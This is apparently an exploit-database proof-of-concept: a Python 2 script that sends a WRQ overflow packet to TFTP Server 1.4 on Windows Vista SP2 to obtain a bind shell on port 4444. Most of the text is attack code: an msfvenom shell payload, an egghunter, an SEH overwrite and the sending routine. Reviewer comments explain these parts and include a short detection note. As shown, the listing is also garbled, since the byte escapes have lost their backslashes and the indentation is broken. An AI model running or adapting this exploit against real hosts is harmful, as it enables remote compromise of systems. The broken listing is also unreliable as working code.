TFTP Server 1.4 WRQ Buffer Overflow


# Exploit Title: [TFTP Server 1.4 - WRQ Buffer Overflow Exploit [Egghunter]]
# Exploit Author: [Karn Ganeshen]
# Vendor Homepage: [http://sourceforge.net/projects/tftp-server/]
# Version: [1.4]
# Tested on: [Windows Vista SP2]
#
# Coded this for Vista Ultimate, Service Pack 2
# 3-byte overwrite + short jump + Egghunter
# Standalone mode
#
# Couple of overflow exploits already here for this tftp, none for Vista SP2 + Egghunter:
# http://www.exploit-db.com/exploits/5314/
# http://www.exploit-db.com/exploits/10542/
# http://www.exploit-db.com/exploits/5563/
# https://www.exploit-db.com/exploits/18345/
#

#!/usr/bin/python

import socket
import sys

# Destination of the single datagram sent below: a hard-coded IP and the
# standard TFTP UDP port (69).
host = '192.168.49.187'
port = 69

# Python 2 syntax throughout (print statements). In this listing the try/except
# bodies have lost their indentation, so the text does not parse as shown.
# The bare except also discards the real socket error instead of reporting it.
try:
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)

# msfvenom -p windows/shell_bind_tcp LHOST=192.168.49.187 -b x00 EXITFUNC=seh -f c -e x86/alpha_mixed
# Payload size: 718 bytes

# Encoded bind-shell payload (see msfvenom line above).
# NOTE(review): every "\x" escape in this listing has lost its backslash, so
# these literals are plain ASCII text ("x89xe5...") rather than the bytes the
# header comments describe; the same applies to every string below.
shellcode = (
"x89xe5xd9xcfxd9x75xf4x5dx55x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x59x6cx48x68x4fx72x75x50x63x30x33x30x33x50x6f"
"x79x59x75x35x61x6fx30x51x74x6cx4bx42x70x46x50"
"x6ex6bx62x72x66x6cx6cx4bx73x62x56x74x6cx4bx43"
"x42x45x78x66x6fx58x37x73x7ax56x46x54x71x4bx4f"
"x6ex4cx45x6cx50x61x51x6cx33x32x74x6cx61x30x4b"
"x71x68x4fx74x4dx63x31x39x57x58x62x68x72x76x32"
"x71x47x4ex6bx52x72x64x50x4cx4bx30x4ax45x6cx6c"
"x4bx30x4cx36x71x50x78x68x63x70x48x76x61x6bx61"
"x43x61x4ex6bx61x49x45x70x63x31x48x53x4cx4bx72"
"x69x35x48x38x63x77x4ax77x39x6cx4bx65x64x4cx4b"
"x67x71x58x56x75x61x4bx4fx6cx6cx69x51x7ax6fx76"
"x6dx65x51x39x57x45x68x4dx30x34x35x6ax56x45x53"
"x53x4dx5ax58x47x4bx53x4dx77x54x43x45x4dx34x73"
"x68x6cx4bx61x48x57x54x46x61x6bx63x61x76x6cx4b"
"x74x4cx42x6bx4cx4bx30x58x57x6cx75x51x79x43x4c"
"x4bx33x34x6ex6bx46x61x4ex30x4bx39x73x74x56x44"
"x65x74x63x6bx43x6bx63x51x52x79x53x6ax66x31x59"
"x6fx6bx50x33x6fx33x6fx32x7ax6ex6bx35x42x78x6b"
"x4ex6dx43x6dx62x48x37x43x46x52x37x70x35x50x61"
"x78x72x57x64x33x45x62x71x4fx56x34x53x58x32x6c"
"x63x47x34x66x46x67x4bx4fx6ax75x4ex58x4ex70x43"
"x31x75x50x35x50x31x39x6fx34x72x74x70x50x55x38"
"x56x49x4fx70x30x6bx47x70x69x6fx48x55x71x7ax36"
"x68x51x49x70x50x4ax42x4bx4dx61x50x76x30x33x70"
"x36x30x35x38x69x7ax64x4fx59x4fx6bx50x39x6fx4b"
"x65x7ax37x73x58x43x32x63x30x56x71x71x4cx6cx49"
"x69x76x71x7ax64x50x53x66x72x77x73x58x4ax62x79"
"x4bx50x37x65x37x39x6fx6bx65x36x37x42x48x48x37"
"x4bx59x47x48x6bx4fx39x6fx4bx65x51x47x51x78x50"
"x74x5ax4cx65x6bx79x71x69x6fx6ax75x51x47x4fx67"
"x53x58x61x65x32x4ex32x6dx70x61x49x6fx69x45x61"
"x78x72x43x32x4dx30x64x43x30x4bx39x4ax43x70x57"
"x53x67x72x77x64x71x48x76x31x7ax52x32x42x79x52"
"x76x38x62x69x6dx65x36x4bx77x37x34x61x34x47x4c"
"x57x71x45x51x6cx4dx77x34x44x64x72x30x78x46x53"
"x30x67x34x33x64x32x70x70x56x73x66x42x76x62x66"
"x46x36x30x4ex63x66x46x36x42x73x62x76x52x48x71"
"x69x38x4cx35x6fx6ex66x79x6fx49x45x4cx49x4bx50"
"x52x6ex43x66x30x46x59x6fx54x70x62x48x34x48x6c"
"x47x35x4dx55x30x39x6fx38x55x4fx4bx59x6ex34x4e"
"x76x52x59x7ax73x58x6dx76x6cx55x4dx6dx4dx4dx4b"
"x4fx6ex35x47x4cx63x36x71x6cx45x5ax4fx70x49x6b"
"x59x70x74x35x76x65x4dx6bx50x47x32x33x32x52x30"
"x6fx62x4ax45x50x66x33x69x6fx4ex35x41x41")

# PPR - 0x0040CC22 - in TFTPServerSP.exe
# 3-byte overwrite

# Short backward jump, then the egghunter stub tagged "WOOT" by the author.
# Presumably it searches for the "T00WT00W" marker placed in front of the
# payload in `filename` below (the header calls this an egghunter); the stub's
# bytes are not decoded here.
jump_one = "xEBxDBx90x90" # negative jump back
egghunter = ("x66x81xcaxffx0fx42x52x6a" #WOOT
"x02x58xcdx2ex3cx05x5ax74"
"xefxb8x54x30x30x57x8bxfa"
"xafx75xeaxafx75xe7xffxe7")

# The oversized "filename" field is the overflow vector: 734 repetitions of the
# NOP escape, the egg tag + payload, the egghunter, the short jump, and finally
# the three low bytes of 0x0040CC22 in little-endian order (the "3-byte
# overwrite" of the PPR address noted above).
# Defender note: a genuine TFTP filename is short and printable. A WRQ whose
# filename field runs to hundreds of bytes of 0x90 / non-printable data is a
# simple network-IDS signature, and this server version (1.4, per the header)
# should not be reachable from untrusted networks.
filename = "x90"*734 + "T00WT00W" + shellcode + "x90"*10 + egghunter + "x90"*10 + jump_one + "x22xCCx40"

# Transfer mode string; any mode would do as far as the overflow is concerned.
mode = "netascii"

# TFTP WRQ layout (RFC 1350): 2-byte opcode 0x0002, filename, NUL, mode, NUL.
evil = "x00x02" + filename + "x00" + mode + "x00"

# One UDP datagram is sent; no reply is read. The author's msfvenom payload is
# a bind shell, hence the port 4444 message.
print "[*] Sending evil packet, ph33r"
s.sendto(evil, (host, port))
print "[*] Check port 4444 for bindshell"
